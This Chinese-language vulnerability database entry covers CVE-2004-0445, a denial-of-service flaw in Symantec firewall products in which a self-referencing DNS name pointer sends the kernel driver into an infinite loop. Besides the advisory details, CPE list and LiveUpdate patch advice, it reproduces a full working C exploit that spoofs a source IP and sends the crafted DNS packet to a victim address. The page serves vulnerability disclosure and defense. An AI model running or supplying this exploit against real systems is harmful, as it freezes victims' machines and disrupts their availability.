CVE-2004-0445
CVSS2.6
发布时间 :2004-07-07 00:00:00
修订时间 :2008-09-10 15:26:23
NMCOES    

[原文]The SYMDNS.SYS driver in Symantec Norton Internet Security and Professional 2002 through 2004, Norton Personal Firewall 2002 through 2004, Norton AntiSpam 2004, Client Firewall 5.01 and 5.1.1, and Client Security 1.0 through 2.0 allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a DNS response with a compressed name pointer that points to itself.


[CNNVD]Symantec Client Firewall远程域名服务器响应服务拒绝漏洞(CNNVD-200407-003)

        Symantec Norton Internet Security和Professional 2002 到2004,Norton Personal Firewall 2002到2004, Norton AntiSpam 2004, Client Firewall 5.01和5.1.1,以及Client Security 1.0到2.0版本的SYMDNS.SYS驱动程序存在漏洞。远程攻击者借助被压缩的指向他自己名字指针域名服务器响应导致服务拒绝(CPU无限循环消耗)。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:symantec:norton_personal_firewall:2004
cpe:/a:symantec:norton_personal_firewall:2003
cpe:/a:symantec:norton_internet_security:2004
cpe:/a:symantec:client_security:2.0
cpe:/a:symantec:norton_internet_security:2002
cpe:/a:symantec:norton_internet_security:2003::pro
cpe:/a:symantec:client_security:1.0Symantec Symantec Client Security 1.0
cpe:/a:symantec:client_security:1.6
cpe:/a:symantec:client_security:1.8
cpe:/a:symantec:client_security:1.7
cpe:/a:symantec:norton_personal_firewall:2002
cpe:/a:symantec:client_security:1.3
cpe:/a:symantec:norton_internet_security:2003
cpe:/a:symantec:client_firewall:5.01Symantec Symantec Client Firewall 5.01
cpe:/a:symantec:norton_internet_security:2004::pro
cpe:/a:symantec:norton_internet_security:2002::pro
cpe:/a:symantec:client_security:1.9
cpe:/a:symantec:client_security:1.1
cpe:/a:symantec:client_security:1.2
cpe:/a:symantec:client_security:1.5
cpe:/a:symantec:norton_antispam:2004
cpe:/a:symantec:client_firewall:5.1.1Symantec Symantec Client Firewall 5.1.1
cpe:/a:symantec:client_security:1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0445
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0445
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-003
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/682110
(VENDOR_ADVISORY)  CERT-VN  VU#682110
http://securityresponse.symantec.com/avcenter/security/Content/2004.05.12.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2004.05.12.html
http://xforce.iss.net/xforce/xfdb/16132
(UNKNOWN)  XF  symantec-firewall-dns-dos(16132)
http://www.securityfocus.com/bid/10336
(UNKNOWN)  BID  10336
http://secunia.com/advisories/11066
(UNKNOWN)  SECUNIA  11066
http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021359.html
(UNKNOWN)  FULLDISC  20040512 EEYE: Symantec Multiple Firewall DNS Response Denial-of-Service
http://www.osvdb.org/6100
(UNKNOWN)  OSVDB  6100
http://www.ciac.org/ciac/bulletins/o-141.shtml
(UNKNOWN)  CIAC  O-141
http://securitytracker.com/id?1010146
(UNKNOWN)  SECTRACK  1010146
http://securitytracker.com/id?1010145
(UNKNOWN)  SECTRACK  1010145
http://securitytracker.com/id?1010144
(UNKNOWN)  SECTRACK  1010144

- 漏洞信息

Symantec Client Firewall远程域名服务器响应服务拒绝漏洞
低危 其他
2004-07-07 00:00:00 2006-08-28 00:00:00
远程  
        Symantec Norton Internet Security和Professional 2002 到2004,Norton Personal Firewall 2002到2004, Norton AntiSpam 2004, Client Firewall 5.01和5.1.1,以及Client Security 1.0到2.0版本的SYMDNS.SYS驱动程序存在漏洞。远程攻击者借助被压缩的指向他自己名字指针域名服务器响应导致服务拒绝(CPU无限循环消耗)。

- 公告与补丁

        A fix for this vulnerability is reportedly available through the Symantec LiveUpdate service. Customers are advised to run LiveUpdate to address this issue.

- 漏洞信息 (299)

Symantec Multiple Firewall DNS Response Denial of Service (EDBID:299)
windows dos
2004-05-16 Verified
0 houseofdabus
N/A [点击下载]
/* HOD-symantec-firewall-DoS-expl.c:
 *
 * Symantec Multiple Firewall DNS Response Denial-of-Service
 *
 * Exploit version 0.1 coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * Bug discoveried by eEye:
 * http://www.eeye.com/html/Research/Advisories/AD20040512B.html
 *
 * -------------------------------------------------------------------
 * Tested on:
 *    - Symantec Norton Personal Firewall 2004
 *
 *
 * Systems Affected:
 *    - Symantec Norton Internet Security 2002
 *    - Symantec Norton Internet Security 2003
 *    - Symantec Norton Internet Security 2004
 *    - Symantec Norton Internet Security Professional 2002
 *    - Symantec Norton Internet Security Professional 2003
 *    - Symantec Norton Internet Security Professional 2004
 *    - Symantec Norton Personal Firewall 2002
 *    - Symantec Norton Personal Firewall 2003
 *    - Symantec Norton Personal Firewall 2004 
 *    - Symantec Client Firewall 5.01, 5.1.1 
 *    - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
 *    - Symantec Norton AntiSpam 2004
 *
 * -------------------------------------------------------------------
 * Description:
 *    eEye Digital Security has discovered a second vulnerability
 *    in the Symantec firewall product line that can be remotely
 *    exploited to cause a severe denial-of-service condition on
 *    systems running a default installation of an affected version
 *    of the product. By sending a single malicious DNS (UDP port 53)
 *    response packet to a vulnerable host, an attacker can cause
 *    the Symantec DNS response validation code to enter an infinite
 *    loop within the kernel, amounting to a system freeze that requires
 *    the machine to be physically rebooted in order to restore operation.
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
 *    Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *    HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] 
 *
 *           -fi:IP    From (sender) IP address
 *           -tp:int   To (recipient) port number
 *           -ti:IP    To (recipient) IP address
 *           -n:int    Number of times to send message
 *
 */


#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN 
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif

#define MAX_MESSAGE        4068
#define MAX_PACKET         4096

#define DEFAULT_PORT       53
#define DEFAULT_IP         "10.0.0.1"
#define DEFAULT_COUNT      1

#ifndef _WIN32
#       define FAR
#endif


/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c"  /* Transaction ID */
"\x80\x00"  /* Flags (bit 15: response) */
"\x00\x01"  /* Number of questions */
"\x00\x01"  /* Number of answer RRs */
"\x00\x00"  /* Number of authority RRs */
"\x00\x00"  /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */


/* Define the IP header */
typedef struct ip_hdr {
    unsigned char  ip_verlen;        /* IP version & length */
    unsigned char  ip_tos;           /* IP type of service */
    unsigned short ip_totallength;   /* Total length */
    unsigned short ip_id;            /* Unique identifier */
    unsigned short ip_offset;        /* Fragment offset field */
    unsigned char  ip_ttl;           /* Time to live */
    unsigned char  ip_protocol;      /* Protocol */
    unsigned short ip_checksum;      /* IP checksum */
    unsigned int   ip_srcaddr;       /* Source address */
    unsigned int   ip_destaddr;      /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */
typedef struct udp_hdr {
    unsigned short src_portno;       /* Source port number */
    unsigned short dst_portno;       /* Destination port number */
    unsigned short udp_length;       /* UDP packet length */
    unsigned short udp_checksum;     /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;


/* globals */
unsigned long  dwToIP,               // IP to send to
               dwFromIP;             // IP to send from (spoof)
unsigned short iToPort,              // Port to send to
               iFromPort;            // Port to send from (spoof)
unsigned long  dwCount;              // Number of times to send
char           strMessage[MAX_MESSAGE]; // Message to send



void
usage(char *progname) {
	printf("Usage:\n\n");
    printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname);
    printf("       -fi:IP    From (sender) IP address\n");
    printf("       -tp:int   To (recipient) open UDP port number:\n");
	printf("                 137, 138, 445, 500(default)\n");
    printf("       -ti:IP    To (recipient) IP address\n");
    printf("       -n:int    Number of times\n");
    exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
    int                i;

    iToPort = 500;
    iFromPort = DEFAULT_PORT;
    dwToIP = inet_addr(DEFAULT_IP);
    dwFromIP = inet_addr(DEFAULT_IP); 
    dwCount = DEFAULT_COUNT;
	memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

    for(i = 1; i < argc; i++) {
        if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
            switch (tolower(argv[i][1])) {
                case 'f':
                    switch (tolower(argv[i][2])) {
                        case 'i':
                            if (strlen(argv[i]) > 4)
                                dwFromIP = inet_addr(&argv[i][4]);
                            break;
                        default:
                            usage(argv[0]);
                            break;
                    }    
                    break;
                case 't':
                    switch (tolower(argv[i][2])) {
                        case 'p':
                            if (strlen(argv[i]) > 4)
                                iToPort = atoi(&argv[i][4]);
                            break;
                        case 'i':
                            if (strlen(argv[i]) > 4)
                                dwToIP = inet_addr(&argv[i][4]);
                            break;
                        default:
                            usage(argv[0]);
                            break;
                    }    
                    break;
                case 'n':
                    if (strlen(argv[i]) > 3)
                        dwCount = atol(&argv[i][3]);
                    break;
                default:
                    usage(argv[0]);
                    break;
            }
        }
    }
    return;
}


/*    This function calculates the 16-bit one's complement sum */
/*    for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size  -= sizeof(unsigned short);   
    }
    if (size) {
        cksum += *(unsigned char *)buffer;   
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16); 

    return (unsigned short)(~cksum); 
}




int
main(int argc, char **argv)
{
#ifdef _WIN32
    WSADATA            wsd;
#endif
    int                s;
#ifdef _WIN32
	BOOL                bOpt;
#else
	int                bOpt;
#endif
    struct sockaddr_in remote;
    IP_HDR             ipHdr;
    UDP_HDR            udpHdr;
    int                ret;
    unsigned long      i;
    unsigned short     iTotalSize,
                       iUdpSize,
                       iUdpChecksumSize,
                       iIPVersion,
                       iIPSize,
                       cksum = 0;
    char               buf[MAX_PACKET],
                       *ptr = NULL;
#ifdef _WIN32
    IN_ADDR            addr;
#else
	struct sockaddr_in addr;
#endif

	printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");
    printf("Bug discoveried by eEye:\n");
    printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 3) usage(argv[0]);

    /* Parse command line arguments and print them out */
    ValidateArgs(argc, argv);
#ifdef _WIN32
    addr.S_un.S_addr = dwFromIP;
    printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);
    addr.S_un.S_addr = dwToIP;
    printf("[*] To   IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);
    printf("[*] Count:   %d\n", dwCount);
#else
    addr.sin_addr.s_addr = dwFromIP;
    printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);
    addr.sin_addr.s_addr = dwToIP;
    printf("[*] To   IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort);
    printf("[*] Count:   %d\n", dwCount);
#endif

#ifdef _WIN32
    if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
        printf("[-] WSAStartup() failed: %d\n", GetLastError());
        return -1;
    }
#endif
    /*  Creating a raw socket */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
    if (s == INVALID_SOCKET) {
        printf("[-] WSASocket() failed: %d\n", WSAGetLastError());
        return -1;
    }
#endif

    /* Enable the IP header include option */
#ifdef _WIN32
    bOpt = TRUE;
#else
    bOpt = 1;
#endif
    ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
    if (ret == SOCKET_ERROR) {
        printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
        return -1;
    }
#endif
    /* Initalize the IP header */
    iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

    iIPVersion = 4;
    iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

    ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
    ipHdr.ip_tos = 0;                         /* IP type of service */
    ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
    ipHdr.ip_id = 0;                 /* Unique identifier: set to 0 */
    ipHdr.ip_offset = 0;             /* Fragment offset field */
    ipHdr.ip_ttl = 128;              /* Time to live */
    ipHdr.ip_protocol = 0x11;        /* Protocol(UDP) */
    ipHdr.ip_checksum = 0 ;          /* IP checksum */
    ipHdr.ip_srcaddr = dwFromIP;     /* Source address */
    ipHdr.ip_destaddr = dwToIP;      /* Destination address */

    /* Initalize the UDP header */
    iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

    udpHdr.src_portno = htons(iFromPort) ;
    udpHdr.dst_portno = htons(iToPort) ;
    udpHdr.udp_length = htons(iUdpSize) ;
    udpHdr.udp_checksum = 0 ;


	iUdpChecksumSize = 0;
    ptr = buf;
	memset(buf, 0, MAX_PACKET);

    memcpy(ptr, &ipHdr.ip_srcaddr,  sizeof(ipHdr.ip_srcaddr));  
    ptr += sizeof(ipHdr.ip_srcaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

    memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); 
    ptr += sizeof(ipHdr.ip_destaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

    ptr++;
    iUdpChecksumSize += 1;

    memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); 
    ptr += sizeof(ipHdr.ip_protocol);
    iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

    memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); 
    ptr += sizeof(udpHdr.udp_length);
    iUdpChecksumSize += sizeof(udpHdr.udp_length);
    
    memcpy(ptr, &udpHdr, sizeof(udpHdr)); 
    ptr += sizeof(udpHdr);
    iUdpChecksumSize += sizeof(udpHdr);

	for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)
        *ptr = strMessage[i];
    iUdpChecksumSize += sizeof(dnsreply)-1;

    cksum = checksum((unsigned short *)buf, iUdpChecksumSize);
    udpHdr.udp_checksum = cksum;


	memset(buf, 0, MAX_PACKET);
    ptr = buf;

    memcpy(ptr, &ipHdr, sizeof(ipHdr));   ptr += sizeof(ipHdr);
    memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);
    memcpy(ptr, strMessage, sizeof(dnsreply)-1);

    remote.sin_family = AF_INET;
    remote.sin_port = htons(iToPort);
    remote.sin_addr.s_addr = dwToIP;
   
    for(i = 0; i < dwCount; i++) {
#ifdef _WIN32
        ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, 
            sizeof(remote));

        if (ret == SOCKET_ERROR) {
            printf("[-] sendto() failed: %d\n", WSAGetLastError());
            break;
        } else
#else
        ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, 
            sizeof(remote));
#endif
            printf("[+] sent %d bytes\n", ret);
    }

#ifdef _WIN32
    closesocket(s);
    WSACleanup();
#endif

    return 0;
}



// milw0rm.com [2004-05-16]
		

- 漏洞信息

6100
Symantec Multiple Firewall DNS Response DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

Symantec personal firewalls contain a flaw that may allow a remote attacker to freeze the system and force a reboot. The issue is due to DNS response validation code not properly handling malformed DNS packets. By sending a specially crafted single packet, an attacker can cause the system to enter an infinite loop within the kernel, effectively freezing the system. A system reboot would be required to resume normal operations.

- 时间线

2004-05-12 2004-04-19
2004-05-12 2004-05-12

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability. Customers can obtain the update via the LiveUpdate utility: 1. Open any installed Symantec product 2. Click on LiveUpdate in the toolbar 3. Run LiveUpdate until Symantec LiveUpdate indicated that all installed Symantec products are up-to-date

- 相关参考

- 漏洞作者

- 漏洞信息

Symantec Client Firewall Remote DNS Response Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 10336
Yes No
2004-05-12 12:00:00 2006-09-05 10:28:00
Discovery of this vulnerability has been credited to Barnaby Jack, Karl Lynn and Derek Soeder.

- 受影响的程序版本

Symantec Norton Personal Firewall 2004
Symantec Norton Personal Firewall 2003
Symantec Norton Personal Firewall 2002
Symantec Norton Internet Security 2004 Professional Edition
Symantec Norton Internet Security 2004
Symantec Norton Internet Security 2003 Professional Edition
Symantec Norton Internet Security 2003
Symantec Norton Internet Security 2002 Professional Edition 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton Internet Security 2002 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiSpam 2004
+ Symantec Norton Internet Security 2004
+ Symantec Norton Internet Security 2004 Professional Edition
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 1.1
Symantec Client Security 1.0
Symantec Client Firewall 5.1.1
Symantec Client Firewall 5.0 1

- 漏洞讨论

Various Symantec Client Firewall products are prone to a remote denial-of-service vulnerability because the applications fail to properly handle DNS response packets.

- 漏洞利用

The discoverers of this issue have produced a proof-of-concept exploit, but it is not currently in public circulation.

The following exploit has been publically released:

- 解决方案

A fix for this vulnerability is reportedly available through the Symantec LiveUpdate service. Customers are advised to run LiveUpdate to address this issue.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站